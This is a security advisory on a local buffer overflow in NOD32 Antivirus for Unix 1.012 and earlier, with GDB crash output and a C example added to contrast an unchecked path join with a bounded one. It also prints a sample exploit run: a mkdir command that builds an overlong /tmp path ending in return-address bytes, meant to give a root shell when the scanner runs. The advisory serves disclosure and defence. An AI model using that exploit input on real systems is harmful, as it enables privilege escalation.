COMMAND

    NOD32 Antivirus Software for Unix Buffer Overflow

SYSTEMS AFFECTED

    NOD32 Antivirus System for Unix version 1.012 and below is vulnerable.

PROBLEM

    From iDEFENSE Security Advisory 02.10.03, http://www.idefense.com/advisory/02.10.03.txt, with credit to Knud Erik Højgaard [knud@skodliv.dk]:

    --snip--

    Local exploitation of a buffer overflow in NOD32 for UNIX could allow attackers to gain super-user (root) privileges. The overflow occurs when NOD32 parses a path with a name of length greater than 500 characters (/tmp/AAAAA....AAA). An attacker can overwrite the first three bytes of the eax and ecx registers, as can be seen from the following GDB output:

        ...
        Program received signal SIGSEGV, Segmentation fault.
        0x4207fa78 in strcmp () from /lib/i686/libc.so.6
        (gdb) bt
        #0  0x4207fa78 in strcmp () from /lib/i686/libc.so.6
        #1  0x0804c2ba in scan_dir ()
        #2  0x41414141 in ?? ()
        Cannot access memory at address 0x41414141
        (gdb) info registers
        eax            0x4141414c       1094795596
        ecx            0x4141414c       1094795596
        ...

    ANALYSIS
    ========

    Exploitation allows local code execution with the privileges of the user who spawned NOD32. This is possible by creating an exploit path and then socially engineering a target user into scanning over the exploit path using NOD32. If the attacker has write permissions to a directory that is routinely scanned with NOD32 (such as /tmp), he or she can gain the privileges of the scanning user (usually root).

    Proof of concept exploit code has been written for the FreeBSD 4.7 platform. The following is a sample exploit run that should set up shell code in an environment variable and spawn a shell under the privileges of the user executing NOD32:

        $ perl eggnod.pl
        $ mkdir -p /tmp/`perl -e 'print "A" x 255'`/`perl -e 'print "B" x 240 . "\xfc\xbf\xbf"'`
        $ nod32 /tmp

    --snap--

SOLUTION

    Version 1.013 fixes the issue and can be downloaded from http://www.nod32.com
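The backtrace above (a frame at 0x41414141 below scan_dir) is the signature of a fixed-size path buffer on the stack being filled past its end while a directory tree is walked. The C example below is added here for illustration and is neither NOD32's code nor part of the iDEFENSE advisory: it shows the unchecked path-join pattern that produces this crash beside a bounded version that refuses over-long paths, and it rebuilds the two PoC path components (255 "A" bytes, then 240 "B" bytes plus 0xfc 0xbf 0xbf) as constructed sample input to show that the resulting path is 504 bytes. The buffer size of 500 and the join_path_unchecked / join_path_checked / scan_poc_path names are assumptions; the advisory only states that the overflow begins past 500 characters.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the fixed on-stack path buffer. The advisory only says the
 * overflow starts past 500 characters, so 500 is an assumption, not NOD32's
 * real constant. */
#define PATH_BUF 500

/* Vulnerable pattern (illustrative, not NOD32's code): directory and entry
 * name are concatenated into a fixed buffer with no length check. A component
 * longer than the space left runs past the buffer and, when the buffer lives
 * on the stack, over the saved frame pointer and return address; that is how
 * a 0x41414141 frame like the one in the advisory's backtrace arises.
 * This file only ever calls it with short inputs. */
static void join_path_unchecked(char *out, const char *dir, const char *name)
{
    strcpy(out, dir);
    strcat(out, "/");
    strcat(out, name);
}

/* Hardened version: bounded formatting; truncation is reported as an error
 * and the buffer is emptied so the caller cannot act on a partial path. */
static int join_path_checked(char *out, size_t outsz, const char *dir, const char *name)
{
    int n = snprintf(out, outsz, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= outsz) {
        if (outsz > 0)
            out[0] = '\0';
        return -1;
    }
    return n;
}

/* A string of n copies of c, like perl -e 'print "A" x 255'. Caller frees. */
static char *make_run(char c, size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return NULL;
    memset(s, c, n);
    s[n] = '\0';
    return s;
}

/* Rebuild the PoC path components as constructed sample input and run them
 * through the checked join against a PATH_BUF-sized buffer, as a hardened
 * scanner would when descending from /tmp. On return *total_len holds the
 * length the full path would need. Returns 0 if the path fit, -1 if the
 * checked join rejected it, -2 on allocation or setup failure. */
static int scan_poc_path(size_t *total_len)
{
    char parent[PATH_BUF];
    char full[PATH_BUF];
    char *a = make_run('A', 255);   /* first component: 255 x "A" */
    char *b = make_run('B', 243);   /* second: 240 x "B" + 3 address bytes */
    int rc = -2;

    if (a != NULL && b != NULL) {
        memcpy(b + 240, "\xfc\xbf\xbf", 3);
        /* "/tmp/" + 255 A's = 260 bytes, which still fits */
        if (join_path_checked(parent, sizeof parent, "/tmp", a) > 0) {
            *total_len = strlen(parent) + 1 + strlen(b);
            rc = join_path_checked(full, sizeof full, parent, b) < 0 ? -1 : 0;
        }
    }
    free(a);
    free(b);
    return rc;
}

int main(void)
{
    char buf[PATH_BUF];
    size_t len = 0;
    int rc;

    join_path_unchecked(buf, "/tmp", "file.txt");   /* short input: safe */
    printf("unchecked join: %s\n", buf);

    rc = scan_poc_path(&len);
    printf("PoC path needs %zu bytes; checked join %s it\n",
           len, rc == 0 ? "accepted" : "rejected");
    return 0;
}
```

The checked join treats "would not fit" as a hard error rather than silently truncating: a scanner that truncated and carried on would skip or mis-scan the deepest entries, which is its own problem, but it would no longer hand an attacker control of the return address.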